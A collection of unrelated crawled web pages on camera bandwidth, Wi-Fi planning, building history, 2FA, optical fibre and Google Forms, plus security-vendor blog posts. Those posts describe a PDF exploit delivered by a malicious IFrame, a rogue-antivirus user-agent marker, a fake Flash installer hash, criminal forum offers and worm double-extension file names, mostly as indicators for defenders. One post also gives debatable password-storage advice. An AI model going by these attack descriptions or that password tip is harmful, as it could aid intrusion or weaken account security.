Frame rate selection has a major impact on bandwidth consumption for surveillance cameras. While most cameras have a maximum frame rate of 25 to 30 frames per second, users typically choose significantly lower frame rates, driven by a desire to minimize storage consumption. The most direct way to reduce storage is to use a lower bit rate stream for each camera, achieved with lower frame rates. A key practical question is how much bandwidth is saved as the frame rate is dropped? Lower frame rates should result in lower bit rates, but how significant are those changes and does this change depending on the scene? In this report, we share the results of a series of experiments we did with 3 IP cameras (Avigilon, Axis and Sony) in 3 different scenes: (1) indoor daytime, (2) indoor dark (< 1 lux), and (3) daytime outdoor (intersection). We did tests at 1, 5, 10, 15 and 30 fps to see how bandwidth consumption varied across a variety of frame rates. We then produced a series of charts comparing bitrate vs frame rate and average frame size vs frame rate to provide two views on the relationship between these parameters. With these test results, we answer the following questions: - How does bandwidth efficiency vary with changes in the frame rate? - Are low frame rate streams inefficient? - How can you project bandwidth consumption for various frame rates? - Do different scene types impact bandwidth vs frame rate efficiency? - How does the choice of VBR vs CBR impact the relationship between bandwidth and frame rate? For background on frame rates, Pro members should review our frame rate fundamentals training. Also, for those interested in understanding the impact of bandwidth, review our sister report that examines the relationship between bandwidth and image quality.
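One rough way to approach the projection question above is to start from an average encoded frame size and scale linearly with frame rate; measured streams typically grow less than linearly because inter-frame compression becomes more effective at higher frame rates. The numbers in this sketch are invented for illustration, not taken from the test results.

```python
# Naive bandwidth projection from frame rate and average frame size.
# Numbers are invented for illustration; measured streams typically grow
# less than linearly with frame rate because temporal compression improves.
AVG_FRAME_SIZE_KB = 25        # assumed average encoded frame size for this scene/quality

def projected_bitrate_kbps(fps, avg_frame_kb=AVG_FRAME_SIZE_KB):
    return fps * avg_frame_kb * 8            # KB/frame * frames/s * 8 bits/byte

def storage_gb_per_day(bitrate_kbps):
    return bitrate_kbps * 86400 / 8 / 1024 / 1024   # kilobits/s -> GB per day

for fps in (1, 5, 10, 15, 30):
    kbps = projected_bitrate_kbps(fps)
    print(f"{fps:>2} fps ~ {kbps:>5.0f} Kbps ~ {storage_gb_per_day(kbps):5.1f} GB/day")
```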
<urn:uuid:7d422bb6-c89b-4be7-89e1-2a862d020190>
CC-MAIN-2017-04
https://ipvm.com/reports/bandwidth-vs-framerate
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281649.59/warc/CC-MAIN-20170116095121-00533-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918003
355
2.515625
3
Up-front analysis is key. Have a scale drawing of your area so you can map out your AP placement. A free tool like Meraki's WiFi Stumbler will help you size up, in any environment, the neighboring wireless networks that need to be worked around, showing adjacent network names, channels in use and how strongly they are being felt in your space. Once you map the airspace, you can design your own access point placement. Remember that your airspace will change over time as neighbors add or remove their own access points, but you can adjust your network as needed. Estimate how many users are going to be on the wireless network at a given time. If more than 15-20 users might be on the wireless network at the same time, you'll need to plan for more access points even if just one can fill the given area with signal. Wireless is a shared medium and when you get over 20 simultaneous users, contention will become a limiting factor in performance. Determine the minimum throughput you'd like to provide. 802.11a/g offers up to 54 Mbps while 802.11n can reach, in theory, 600 Mbps (though actual data rates will be much, much lower). The data rates will increase and decrease based on conditions in the airwaves. Balancing the data rate and number of users is a tricky process. Web and mail traffic might be considered lightweight, but a single YouTube video is usually around 500 Kbps. Consider what your users are likely to be doing; 10 users all streaming video might max out an 11g access point, for example. Map out the size of the area you need to cover. APs are usually "rated" for open areas when distances are claimed. You might get 200 feet of good signal outdoors, but only a couple of rooms inside. Construction materials make effective wireless barriers, particularly in older buildings where metal screening was often used to hold plaster. Verification is a must. If you see signal falling below -70 dBm, you need another AP. You don't need to have your AP blasting at full power either. If you are at an edge, try adjusting the power levels so that you have adequate power for your area, but are also being a nice neighbor. It's also a good time to go talk to your neighbors who are using maximum power to see if they can turn it down a bit.
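Pulling those rules of thumb together (15-20 users per AP, a per-user throughput target, and a roughly -70 dBm floor at the coverage edge), a quick back-of-the-envelope estimate can be scripted as below; the per-AP usable throughput figure is an assumption, not a vendor specification.

```python
import math

# Rules of thumb from the text above, treated here as assumptions.
MAX_USERS_PER_AP = 20          # contention becomes limiting past ~15-20 users
USABLE_AP_THROUGHPUT_MBPS = 25 # rough usable share of an 802.11g/n cell (assumed)
MIN_SIGNAL_DBM = -70           # weakest acceptable signal at the coverage edge

def aps_needed(concurrent_users, per_user_mbps, coverage_aps):
    """Return the AP count implied by user count, throughput, and coverage."""
    by_users = math.ceil(concurrent_users / MAX_USERS_PER_AP)
    by_throughput = math.ceil(concurrent_users * per_user_mbps / USABLE_AP_THROUGHPUT_MBPS)
    return max(by_users, by_throughput, coverage_aps)

def coverage_ok(measured_dbm):
    """True if a survey reading at the cell edge meets the -70 dBm rule."""
    return measured_dbm >= MIN_SIGNAL_DBM

# Example: 45 users streaming ~0.5 Mbps each, and a floor plan that
# needs at least 2 APs just to fill the space with signal.
print(aps_needed(concurrent_users=45, per_user_mbps=0.5, coverage_aps=2))  # -> 3
print(coverage_ok(-65), coverage_ok(-78))                                  # -> True False
```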
<urn:uuid:dec47798-ae07-4aff-90ec-936d0d835c42>
CC-MAIN-2017-04
http://www.networkcomputing.com/wireless/how-deploy-open-area-wireless/82508305?piddl_msgorder=asc
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00103-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949377
478
2.59375
3
JVP- The Building History The National Mint Building was designed by the Chief Architect of the British Empire’s Public Works Department, Austin St. Barb Harrison, and built in 1937 as the Mandate’s official Mint. Harrison also designed other well known government buildings in Jerusalem, such as the Rockefeller Museum and the main post office on Jaffa Rd. The Mint, a classic Industrial Bauhaus design, is one of the most important industrial structures built in Palestine in the 1930’s and has inspired the design of other buildings around the country. The building served as the Mandate’s Mint until the declaration of the State of Israel in 1948, when it served the newly formed Government. It served as the National Mint until the 1960’s, when it was turned into a warehouse and then finally abandoned in the 1980’s. In 2006, Erel Margalit initiated extensive preservation and renovation efforts led by Plesner Architects and formed the JVP Media Quarter in the building and neighboring train station warehouses. The unique structure became a monument in the city’s skyline, buzzing with activity 24 hours a day as employees and visitors alike enjoy an atmosphere of creativity and innovation alongside a deep respect for the history of Jerusalem and its powerful legacy. (Photos provided by David Kroyanker http://www.kroyanker.co.il/) The Mint's original entrance which was preserved and is used to this day View from the southeast of the E shaped building with a second level along the north facade View from the west. The north facade was preserved completely, including the original windows' structure and mechanisms In the courtyard, workers unpacking crates delivered from the neighboring train station
<urn:uuid:8755dc8a-1204-4bbe-98bf-886056950685>
CC-MAIN-2017-04
http://www.jvpvc.com/history
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00405-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961667
350
3.125
3
Department of Defense The mission of the Department of Defense (DoD) is to protect and defend the United States through a balance of military and civilian power. The DoD is made up of several combatant and non-combatant agencies. The combatant agencies include our United States military departments and the non-combatant agencies include agencies such as the National Security Agency and the Defense Intelligence Agency. The primary purpose of the Department of Defense is to provide civilian control over the United States military. In doing so a set of policies and directives are put into place to establish limitations and provide structure to keep a balance between military and civilian power.
<urn:uuid:9f2012fa-fefe-4389-a704-a01a2ed32989>
CC-MAIN-2017-04
http://www.halfaker.com/department-defense
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00433-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957619
128
2.640625
3
This is from a few weeks ago, and I only just got to it. Hackers can exfiltrate data via a cellphone and no longer need the Internet to invade and control a system, Ben Gurion University researchers say. Using a technique called air-gap network hacking, all a hacker has to do is implant the right kind of malware into a cellphone that gets within range of a computer. Hackers on the other side of the world could use cellphone-based malware to remotely access any data they want, using the electromagnetic waves emanating from computer or server hardware, with no need for an Internet connection. The concept is not new, but what’s new is the use of a cellphone to do it. Stuxnet was put on a thumbdrive to infect Iranian servers, and carried in. The new attack is light-years ahead of Stuxnet, because no physical contact is required to compromise a system. How could a mobile phone be used to hack into an air-gapped network? In a take-off of an email phishing attack, a hacker could send an unsuspecting employee in a sensitive installation a text message that looks legitimate, but contains a link to malware that surreptitiously gets installed on their cellphone. Once the malware is on the phone, it scans for electromagnetic waves which can be manipulated to build a network connection using FM frequencies to install a virus onto a computer or server. The Ben Gurion University team has demonstrated how this is done with computer video cards and monitors. With the virus installed on the system, the phone connects to it via the FM frequency, sucks information out of the server and uses the phone’s cellphone network connection to transmit the data back to hackers. All that’s needed is physical proximity to the system. The team said that one to six meters is enough. Right now, there’s little that can be done to prevent this kind of cyber-attack other than turning off the phone. As that is not a practical solution in this day and age, the research team is searching for other solutions. It’s a major security risk, the researchers said. Until a solution is found, that risk will only increase, as news of the hack spreads in the hacker community. Link to Times of Israel article with more information:
Two Factor Authentication, or 2FA, takes a combination of generally accepted forms of authentication to further secure your login to big sites and applications such as Facebook, Microsoft, Google, Apple iCloud and others. This is an extra layer of protection that utilizes something you know, such as a password, and something only you have, such as a cell phone or fingerprint. This is not necessarily a new idea; many of us use it every day when making purchases with a credit card and being asked to enter a zip code for verification. There are 3 generally accepted factors of authentication:
Something you know – such as a password
Something you have – such as a hardware token like a cell phone
Something you are – such as your fingerprint
Two Factor Authentication takes two of the above in order to secure your login. For instance, if you have 2FA enabled on Facebook, when you attempt to log into Facebook on a new device or browser you will be asked to confirm this login with a second form of authentication, which can be any of the three described above. This form of authentication is especially advised for sites and applications that house your personal information, credit cards, or location information, are tied to other accounts, and could otherwise affect your personal life, such as email and social media – the list is endless! A few big names have taken heed of this advice by employing 2FA; although the process is not entirely seamless, great strides have been taken to make using 2FA as easy as possible. Look for 2FA on your favorite big name sites and applications.
Set up Google 2FA here
Set up Apple 2FA here
Set up Microsoft 2FA here
If you would like to educate yourself in more detail about the information presented in this blog post, please visit:
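To make the "something you have" factor more concrete, here is a minimal sketch of how the one-time codes produced by authenticator apps are typically generated (standard TOTP per RFC 6238). This is an illustration of the general mechanism rather than any particular vendor's implementation, and the base32 secret shown is a made-up example.

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, digits: int = 6, period: int = 30) -> str:
    """Return the current time-based one-time password for a base32 secret."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // period            # 30-second time step
    msg = struct.pack(">Q", counter)                # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Hypothetical shared secret: the phone app and the site derive the same
# 6-digit code from this secret and the current time, so a stolen password
# alone is not enough to log in.
print(totp("JBSWY3DPEHPK3PXP"))
```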
From the NYT: In an experiment published late last year, two University of Texas psychologists threw out the final exam for the 900 students in their intro psych course and replaced it with a series of short quizzes that students took on their laptops at the beginning of each class. Turns out, taking tests on a regular basis seems to be good at teaching people how to do something. This seems intuitive to me, as isn’t this what the real world application of knowledge will require? Aren’t we learning so that we can use this information? I wonder if we should basically get a lecture, or watch a video, or read a short excerpt of something, and then go into recall mode. Either building something with that knowledge, or being forced to recall it in various ways repeatedly. If I didn’t know any better, which I don’t, I’d simply say that learning should be practicing exactly what’s going to happen in the real world. And that means building with the knowledge, and recalling it.
Addressing the challenges renewable energy poses for the electricity industry.
In 2009, the importance of renewable energy will continue to present challenges and targets for the electricity industry across the globe. As deadlines to meet carbon emissions targets get closer and political pressure increases, many challenges remain for the industry. While many alternative energy solutions are well known, their roll-out and installation will present a number of problems. These problems are not insurmountable; however, many are expensive or require further time and energy to develop. In this Point of View, Capgemini explores the real impact of renewable energy on the electric grid, the issues companies face, and how these challenges can be overcome.
The team that broke the terabit barrier in 2009 is at it again. This time the High-Speed Optical Communications (HSOC) team at the Technical University of Denmark accomplished a record-smashing 43 terabits per second (Tbps) transfer speed over a single optical fiber with just one laser transmitter. That's equivalent to a transfer rate of around 5.4 terabytes per second. The High-Speed Optical Communications group at the university's photonics engineering department beat the previous record – 26 terabits per second – set by the Karlsruhe Institute of Technology in 2011. As worldwide Internet traffic grows by 40–50 percent annually, driven by the popularity of cloud services and streamed music and video applications, network vendors are struggling to meet this demand. The DTU team achieved its latest record thanks to a new type of optical fiber, developed by Japanese telco NTT. The fiber contains seven cores made of glass threads, instead of the single core used in standard fibers, enabling it to transfer more data in the same amount of space. Most core networks use a technology called DWDM (dense wavelength division multiplexing) to boost capacity by sending multiple channels of data at the same time, each transmitted by a different laser. Although this latest demonstration involved a single laser and a single fiber, a network built with the multi-core fibers would support much higher transfer rates than 43 Tbps. Stuffing so much data into a single lane will also save on energy, an important benefit considering IT networks consume about 2 percent of global energy demand. Previously, DTU researchers achieved the highest combined data transmission speed in the world, 1 petabit per second, using a setup with hundreds of lasers. The latest benchmark results have been verified and presented at the CLEO 2014 international conference.
Google Forms makes collecting information easy, but sometimes you don't want everyone to be able to fill out your form. Have you ever wanted to set restrictions on who could complete your Google Form? There are multiple ways of accomplishing this, and the above video will walk you through two different options. The first option allows you to set permissions and identify who can complete your form, meaning you can designate specific people to complete the form through the use of a student ID, for example. This is done by creating an expression in the responses spreadsheet. Once you've identified the people you want to fill out your form, you can create an identification column. In the video, we've chosen to identify students through student ID numbers. After the IDs have been created and provided to the participants, you can then build a concatenate formula. The second option is to password protect your Google Form. To do this, you will have to create two pages for your form. The first page will be a login page where you can enable Data Validation and require an exact match. You will need to provide the password to your form participants. Once they log in with the password, they will be granted access to the second page of your form, where you can begin your questions. To learn more about Google Forms, see this list of articles.
Yesterday President Barack Obama announced his plans for securing cyberspace. It would have been hard to imagine George Bush giving a talk about malware and bots. And that's exactly what Obama did. From Obama, phrases like this sound perfectly natural: "we've had to learn a whole new vocabulary just to stay ahead of the cyber criminals who would do us harm -- spyware and malware and spoofing and phishing and botnets." President Obama also mentioned Conficker by name, which was interesting. The full text of his speech is available online. Another quote: "Our Information Age is still in its infancy. We're only at Web 2.0." My comments on President Obama's announcement are available in the New York Times. There's some speculation among experts. Why Facebook? Has Facebook become a keystone from which to launch and steal all of an individual's passwords (i.e. banking and commerce sites)? Once you have Facebook, can you then compromise the primary e-mail account and everything else along with it? Let's take Finland as an example. There are over one million estimated Facebook accounts and there are only 5.3 million people living in Finland. The regional network has over 544,000 members. Anything that size will be a target for scammers. Wherever good people go, miscreants will follow. So of course it's an excellent policy to maintain complex passwords that are unique to each site. Right? Here's an idea. Write down your passwords. Seriously. And once you write them down, put them in your wallet. Think about it. What else do you carry in your wallet? That's right, your bank cards. And your bank cards contain your account name and account number. That's kind of like your online account names and passwords. Only this is the key — It's a two part password. Because your account name and bank card number also requires your PIN. So take a look at this screenshot. What do you see? Passwords on a Post-it, only examples of course… non-dictionary ones at that. Keep another three common characters in your head, and you'll have complex 10 character passwords. And you can insert those extra characters in the front, middle, or end. What do we mean? It's like this. The first three characters in this example are based on the website, "aMA" represents Amazon.com. And it can be written several ways, such as "AMa" or "aMa" or "AMA", etc. A good method should be easy for you to remember. The next (or other) part, "2242" as in our example, should be something completely random. This is the part that you really need to write down and keep safe so that you don't forget it. And then you should use a method to add three more characters (your "PIN") to every password. Something such as "35!" So the full password then becomes "aMA224235!" or "aMA35!2242" or "35!aMA2242". Our other example would be "gMA35N135!". Your PIN should never be written down, keep that bit of information in your head. Just like your bank card's PIN. Note that our example does not include an e-mail address on the Post-it. What happens if your wallet is stolen? You call the bank and cancel your cards. And what about your Post-it? If it doesn't include your e-mail address or your PIN, you can reset your passwords in a timely fashion on a new piece of paper. You're good to go. Using this methodology, you can maintain complex and unique passwords, and still have something handy for when you forget them. Because we all do forget stuff from time to time. And if you're phished on one site, such as Facebook, your other accounts aren't sharing the same password. 
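To make the scheme concrete, here is a minimal sketch, in Python, of how the three pieces fit together: a site-based prefix, the random part written on the Post-it, and the memorized "PIN". It is only an illustration of the idea described above, not a tool we ship, and it reuses the same made-up example values from this post.

```python
# Sketch of the Post-it password scheme described above.
# site_part:    derived from the site name (easy to remember)
# written_part: the random characters you write down and keep in your wallet
# pin:          the secret characters you keep only in your head
def build_password(site_part: str, written_part: str, pin: str, position: str = "end") -> str:
    if position == "front":
        return pin + site_part + written_part
    if position == "middle":
        return site_part + pin + written_part
    return site_part + written_part + pin   # default: PIN at the end

# Reproduces the Amazon example above: "aMA" + "2242" + "35!"
print(build_password("aMA", "2242", "35!"))            # aMA224235!
print(build_password("aMA", "2242", "35!", "middle"))  # aMA35!2242
print(build_password("aMA", "2242", "35!", "front"))   # 35!aMA2242
```

Whichever position you choose for the memorized part, use it consistently so the scheme stays easy to recall.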
Oh, one last piece of advice. Don't put the Post-it on your monitor! And not on the underside of your keyboard either… everyone's familiar with that location too. Are you a gadget geek? Do you often seek advice from Gadget Advisor before making a purchase? One of our Web Security Analysts discovered a malicious IFrame on the popular tech website that redirects visitors to a malicious website. If the site detects a PDF browser plugin for Adobe Acrobat and Reader, it loads a specially-crafted malicious PDF file that exploits a stack-based buffer overflow vulnerability (CVE-2008-2992). Below are the readable codes contained within the malicious PDF file. This attack is targeted against older, unpatched versions, as the latest Adobe updates have already fixed this problem. More information and the updates can be found on adobe.com at http://www.adobe.com/support/security/bulletins/apsb08-19.html. But look closely and you'll see that the image above is for Mac Protection. We used to have a Mac solution back in the days of sneakernets. The updates were distributed via floppies. This new Mac Protection (with antivirus) is part of our Technology Preview program and you can download it from our Beta Programs page. An Intel processor based Mac with OS X version 10.5 (Leopard) is a requirement. Macs are popular, with consumers… and also with malware authors. There's plenty of Zlob codec trojans that will infect a Mac if given the chance. Mac's popularity is such that we feel it's time once again for our own Mac solution. Give it a try — Cheers. We've moved. Our Kuala Lumpur Security Lab that is… We successfully transplanted the entire Kuala Lumpur office to new premises over the weekend. The new location offers much more room for expansion as we continue to grow. Here's an exterior shot of the office building — "Menara F-Secure" (F-Secure Tower) is the second tower from the right. And here's a shot of the (much larger) Security Lab, before all the Analysts completed setting up their workstations: There were still boxes, cables and other paraphernalia lying around at the time, as you can see in the background. Today though everything has been set up, all the boxes are being cleared and everyone is getting comfortable again. During the entire move, we were able to maintain full response services by creatively working around the organized turmoil, but it's good to finally settle down and get to work in the new lab. So as an unofficial salute to mark the end of the move: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Do you see it? Right there in the middle, "AntivirXP08". What is that all about? Some rogues modify the browser's user agent. We've seen hundreds of AntivirXP08 string variations. The modified string is possibly used to identify the affiliates responsible for the installation which drives "business" to the rogue's website. Modified user agents could also be used deliver different content. A victim with AntivirXP08 doesn't need to be convinced to download an installer, instead they can be targeted to complete the scam and to buy the rogue. How many infected user agents are out there? Toni examined one of our sinkholes and its April 2009 logs contained 63,000 unique IP addresses using agents that contain AntivirXP08. 63 thousand. That's a lot of infections, right? And that doesn't include other strings we've seen such as "Antimalware2009". 
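The sinkhole measurement above boils down to a simple log-parsing job. Here is a rough sketch of the idea, assuming ordinary combined-format web server logs in which the client IP is the first field and the user agent is the last quoted field; real log formats vary, so treat this as an illustration rather than the exact script we used.

```python
# Count unique client IPs whose user-agent string contains a rogue marker.
import re

MARKERS = ("AntivirXP08", "Antimalware2009")

def infected_ips(logfile: str) -> set:
    ips = set()
    ua_pattern = re.compile(r'"([^"]*)"\s*$')      # last quoted field = user agent
    with open(logfile, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            match = ua_pattern.search(line)
            if not match:
                continue
            if any(marker in match.group(1) for marker in MARKERS):
                ips.add(line.split()[0])            # first field = client IP
    return ips

print(len(infected_ips("access.log")))              # e.g. roughly 63,000 in April 2009
```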
One of our Web Security Analysts came across a website (118,000 ranking in Alexa) that drives users into installing a fake Adobe Flash Player file. The site prompts a message requesting the user download "a new version of Adobe Flash Player" in order to view a video on the site. On clicking "Continue", visitors are taken to this page: Looks pretty authentic, right? It even offers to download an "install_flash_player.exe" file for you. The analyst was using a Linux system though, so this seemed slightly odd. Turns out the site is a (pretty good) fake. Unless a visitor takes a hard look at the address bar, it's pretty easy to be fooled. The downloaded installer also looks like the original Adobe Flash Player installer, though the checksum and digital signatures point out the difference. install_flash_player.exe version 10.0.22.87 md5: 51F26C0051E97A91145971FE5BC632FF Do you enjoy installing and trying out new software? Do you want the chance to win an iPod? Yes? Okay, then keep reading… Our most recent build of F-Secure Internet Security Technology Preview (ISTP) was released last Friday, version 9.40 build 172. Some big changes are being implemented into our products and ISTP 9.40 is our first look at them. The Security Lab has been testing 9.40 and we'd like to encourage our blog readers to do so as well. (Download Beta Programs) The most immediate change you'll notice is the first-level GUI. It is quite different from our present design and will eventually the basis of the entire GUI. It's still evolving so feedback is very formative at this point, if not this year's releases, then next. There are also numerous changes in the technology: • Scanning performance improvements • Boot optimization • Processes optimization • DeepGuard enhancements • New Spam Control • New network-based Parental Control Here's an example of our new Browsing Protection options. Exploit Shield and a network based reputation protection is now integrated (IE and Firefox). Known bad sites will be blocked, and unknown sites will be "shielded" against. And when the Shield is activated, we'll learn about yet another bad site… and that builds a protective feedback loop. The next visitor will be blocked from visiting rather than shielded. Those of you familiar with our current lineup know that DeepGuard is found within our Real-time scanning "System Control" settings. DeepGuard is now uncoupled from Real-time scanning options and includes enhanced process monitoring. ISTP's DeepGuard utilizes our "Cloud" of course. And known malicious applications are blocked on the basis of server queries. If you're offline, DeepGuard can automatically block malicious applications using our latest behavioral engine technology. Alright, so there are a number of important changes and there's lots of testing and work to be done still. And even though we're testing internally, you know that real-world testing by actual users is very important to the process. Another cool thing about the technology… it's updated automatically. Which means that if you are running ISTP 9.30 — It should update itself to Build 172 today via our update channel. If it doesn't soon, that's the kind of feedback we want to read about. One additional note that's very important to us here in the Lab — this ISTP 9.40 release includes lots of changes to our detection technologies. They are more proactive and heuristic than in previous product releases. (DeepGuard being a good example.) This should enhance our detection of undefined/unknown malware. 
If you discover any new samples, we want them! Also, if you encounter a detection that's too aggressive, you can help us with feedback there as well. FBI agent Keith Mularski gave an interview yesterday to Elinor Mills. In the interview he talks for the first time about the background of the infamous Darkmarket.ws sting operation. Special Agent Mularski worked undercover for two years, operating a message forum for online criminals, posing as one of them. The operation ended last fall with 60 arrests around the world. The most famous arrest to come out of this sting operation was the arrest of Çağatay Evyapan in Turkey. Mr. Evyapan, known online as "cha0" was arrested in a raid by a special unit of the Turkish police. Here's a video of cha0's arrest from our Security Wrapup: The Darkmarket case has received a lot of media coverage. But what did the actual site look like when it was still operational? For the first time, we're now publishing a series of screenshots taken of Darkmarket.ws. We took these pictures mostly in 2006 and 2007. They detail how this forum was used to conduct all kinds of online crimes. Login page of Darkmarket.ws Here's a user who is interested in buying access to 3000-4000 infected machines a week. "Get more $$$ for your logs" - this user is advertising cashing services for various banks, used to steal money from online bank accounts. Credentials for these accounts have been stolen via keyloggers. User 'aloaster' has hacked several online shops. Now he's selling administrator access to them. Distributed-denial-of-service attacks for sale. "This is a great deal on DDOS attacks and cannot be beat by anyone!" 200 "dove" stickers for $1500. "Dove stickers" are VISA credit card holograms. We got plenty of good comments on the previous blog post about Windows 7, including feedback from people who are actually working in the Explorer development team at Microsoft. Many of the comments included questions on the topic, so here's a Q&A: Q: What is this all about? A: It's about Windows, by default, hiding file extensions such as .EXE. Virus writers exploit this by creating malicious files with double-extensions (PICTURE.JPG.EXE). Such a file would typically also use a misleading icon. Q: How long has Windows Explorer been hiding file extensions "For known file types"? A: Since Windows NT. Q: Why do they do it? A: We don't know. Q: Is this a real risk? If user already has such a file on his hard drive, it's too late, right? A: Not really. The file could have come from the Internet, from a file share or a removable drive and the user hasn't necessarily executed it yet. Q: But if the file came from the Internet, Explorer will warn you that it came from an "Untrusted Zone"! A: Only if you use Internet Explorer to browse the web and Outlook to download your e-mail attachments. There are plenty of other ways to download files from the net: 3rd party web and e-mail clients, BitTorrent and other P2P clients, chat programs etc. Also, you can't rely on such warning dialogs if the file is on a network share or an a USB drive. Q: There is no problem. Even in your own screenshot the file is labeled by Explorer as "Application"! Thus, nobody would click on it. Even though the file is called something.txt. And it has the icon of a text file. A: Right… Q: Do real worms really use such filenames? A: Oh yes. 
They typically spread by copying themselves with tempting filenames to random folders on removable drives or network shares, with filenames along these lines: E:\PRESENTATION.PPT.exe E:\DOCUMENT.DOC.exe E:\PORNVIDEO.AVI.exe Etc. Many would click on these, especially if the icon of the file looks like a document icon — and when Windows hides the ".exe" part of the name. Q: So, the solution is turn off "Hide extensions for known file types" in Explorer settings? A: Yeah. Q: Will that make all file extensions visible? A: Well, no. There are executable extensions that will STILL be hidden even if you turn the option off. Q: What? A: For example PIF. This file type was meant to be a shortcut to old MS-DOS programs. Problem is, you can rename any modern Windows Executable to .PIF and it will happily run when double-clicked. For example, the Scamo worm uses exactly this flaw, dropping files such as these: HARRY POTTER 1-6 BOOK.TXT.pif ANTHRAX.DOC.pif RINGTONES.MP3.pif BRITNEY SPEARS FULL ALBUM.MP3.pif EMINEM BLOWJOB.JPG.pif VISTA REVIEW.DOC.pif OSAMA BIN LADEN.MPG.pif NOSTRADAMUS.DOC.pif Q: How do you I make PIF files visible then? A: Via a registry key called "NeverShowExt". We'd link you to an article in the Microsoft Knowledgebase… except we couldn't find any. But here's a Web page on the topic, from GeoCities, made by some hobbyist a couple of years ago. Maybe it's the best source of information on the topic. Q: Do you still expect Microsoft to change the behavior of Explorer in Windows 7? A: No, not really. Bottom line: We still fail to see why Windows insists on hiding the last extension in the filename. It's just misleading. Our readership may be interested in this vulnerability description regarding a ZIP and RAR archive evasion vulnerability in our products. On clients and servers, the worst case is a delay in detection and so it's considered to be low severity. We've covered targeted attacks manytimesin the past and we've also covered PDF and vulnerabilities in Adobe Acrobat/Reader being used to install malware. So we decided to take a look at targeted attacks and see which file types were the most popular during 2008 and if that has changed at all during 2009. In 2008 we identified about 1968 targeted attack files. The most popular file type was DOC, i.e. Microsoft Word representing 34.55%. So far in 2009 we have discovered 663 targeted attack files and the most popular file type is now PDF. Why has it changed? Primarily because there has been more vulnerabilities in Adobe Acrobat/Reader than in the Microsoft Office applications. Like the two vulnerabilities we mentioned a week ago. These are scheduled to be fixed by Adobe on May 12. More info about targeted attacks and how they work can be found in the Lab's YouTube video. Because surely by now they've fixed Windows Explorer. You see, in Windows NT, 2000, XP and Vista, Explorer used to Hide extensions for known file types. And virus writers used this "feature" to make people mistake executables for stuff such as document files. The trick was to rename VIRUS.EXE to VIRUS.TXT.EXE or VIRUS.JPG.EXE, and Windows would hide the .EXE part of the filename. Additionally, virus writers would change the icon inside the executable to look like the icon of a text file or an image, and everybody would be fooled.
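Since Explorer hides the final extension by default, a quick way to spot suspicious double-extension files on a drive or share is to check the names yourself. A minimal sketch of that idea follows; the extension lists are illustrative, not exhaustive.

```python
# Flag files whose name ends in a "document-looking" extension followed by an
# executable one, e.g. PRESENTATION.PPT.exe or RINGTONES.MP3.pif.
from pathlib import Path

DECOY_EXTS = {".txt", ".doc", ".ppt", ".jpg", ".avi", ".mp3", ".pdf"}
EXEC_EXTS = {".exe", ".pif", ".scr", ".com"}

def suspicious_files(root: str):
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        suffixes = [s.lower() for s in path.suffixes]
        if len(suffixes) >= 2 and suffixes[-1] in EXEC_EXTS and suffixes[-2] in DECOY_EXTS:
            yield path

for hit in suspicious_files("E:/"):
    print("Suspicious double extension:", hit)
```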
Moving a partition lets you move a subtree in your directory tree. You can move a partition root object (which is a container object) only if it has no subordinate partitions.
Figure 6-3 Before and After a Partition Move
When you move a partition, you must follow eDirectory containment rules. For example, you cannot move an Organizational Unit directly under the root of the current tree, because the root's containment rules allow Locality, Country, or Organization, but not Organizational Unit.
When you move a partition, eDirectory changes all references to the partition root object. Although the object's common name remains unchanged, the complete name of the container (and of all its subordinates) changes.
When you move a partition, you should choose the option to create an Alias object in place of the container you're moving. Doing so allows users to continue to log in to the network and find objects in the original directory location. The Alias object that is created has the same common name as the moved container and references the new complete name of the moved container.
IMPORTANT: If you move a partition and do not create an Alias object in place of the moved partition, users who are unaware of the partition's new location cannot easily find that partition's objects in the directory tree, because they look for them in their original directory location. This might also cause client workstations to fail at login if the workstation NAME CONTEXT parameter is set to the original location of the container in the directory tree.
Because the context of an object changes when you move it, users whose name context references the moved object need to update their NAME CONTEXT parameter so that it references the object's new name. To automatically update users' NAME CONTEXT after moving a container object, use the NCUPDATE utility.
After moving the partition, if you don't want the partition to remain a partition, merge it with its parent partition.
Make sure your directory tree is synchronizing correctly before you move a partition. If you have any errors in synchronization in either the partition you want to move or the destination partition, do not perform a move partition operation. First, fix the synchronization errors.
To move a partition:
1. In NetIQ iManager, open the partition move task.
2. Specify the name and context of the partition object you want to move in the field provided.
3. Specify the container name and context you want to move the partition to in the field provided.
4. If you want to create an Alias in the old location for the partition being moved, select that option. This allows any operations that are dependent on the old location to continue uninterrupted until you can update those operations to reflect the new location.
RIM Crypto API: Overview of Cryptography
In the scope of electronic data transmission, cryptography is used to provide secure, authenticated communication between a sender and a receiver. It encompasses a wide variety of processes, from complex protocols and algorithms to the simple scrambling of letters of text. While cryptography is central to the security and integrity of transmitted data, it is important to realize that no protocol is entirely secure. Protocols and algorithms are constantly being assaulted by increasingly intelligent criminals with increasingly powerful computers. Cryptographers are constantly improving routines and algorithms by increasing key sizes and therefore exponentially increasing the amount of work required by the hacker. The three main goals of cryptography are confidentiality, data integrity, and sender authentication.
